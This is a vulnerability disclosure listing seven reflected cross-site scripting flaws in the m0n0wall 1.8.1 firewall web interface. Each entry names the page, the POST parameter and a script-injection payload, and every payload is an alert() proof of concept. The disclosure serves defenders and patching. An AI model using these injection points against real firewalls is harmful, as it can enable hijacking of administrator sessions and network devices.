m0n0wall version 1.8.1 suffers from multiple cross site scripting vulnerabilities.
cecd595ea39d3d53f9ead78e8110ca3f##################################################################################################################################
# Exploit Title: m0n0wall 1.8.1 | Cross-Site Scripting
# Date: 02.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://m0n0.ch/wall/index.php
# Software Link:
http://sourceforge.net/projects/archiveos/files/m/monowall/generic-pc-1.8.1.iso/download
# Version: 1.8.1
##################################################################################################################################
Introduction
m0n0wall is a project aimed at creating a complete, embedded firewall
software package that, when used together with an embedded PC, provides all
the important features of commercial firewall boxes (including ease of use)
at a fraction of the price (free software).
m0n0wall is based on a bare-bones version of FreeBSD, along with a web
server, PHP and a few other utilities. The entire system configuration is
stored in one single XML text file to keep things transparent.
m0n0wall is probably the first UNIX system that has its boot-time
configuration done with PHP, rather than the usual shell scripts, and that
has the entire system configuration stored in XML format.
#################################################################################
XSS details: Reflected
#################################################################################
XSS1 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
remotenet
PAYLOAD
"><script>alert(1)</script>
#################################################################################
XSS2 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
remotegw
PAYLOAD
"><script>alert(2)</script>
#################################################################################
XSS3 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
p1myident
PAYLOAD
"><script>alert(3)</script>
#################################################################################
XSS4 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
p1lifetime
PAYLOAD
"><script>alert(4)</script>
#################################################################################
XSS5 | Reflected
URL
http://192.168.2.200/vpn_ipsec_edit.php
METHOD
Post
PARAMETER
p2lifetime
PAYLOAD
"><script>alert(5)</script>
#################################################################################
XSS6 | Reflected
URL
http://192.168.2.200/diag_ping.php
METHOD
Post
PARAMETER
host
PAYLOAD
"><script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
http://192.168.2.200/diag_traceroute.php
METHOD
Post
PARAMETER
host
PAYLOAD
"><script>alert(7)</script>
#################################################################################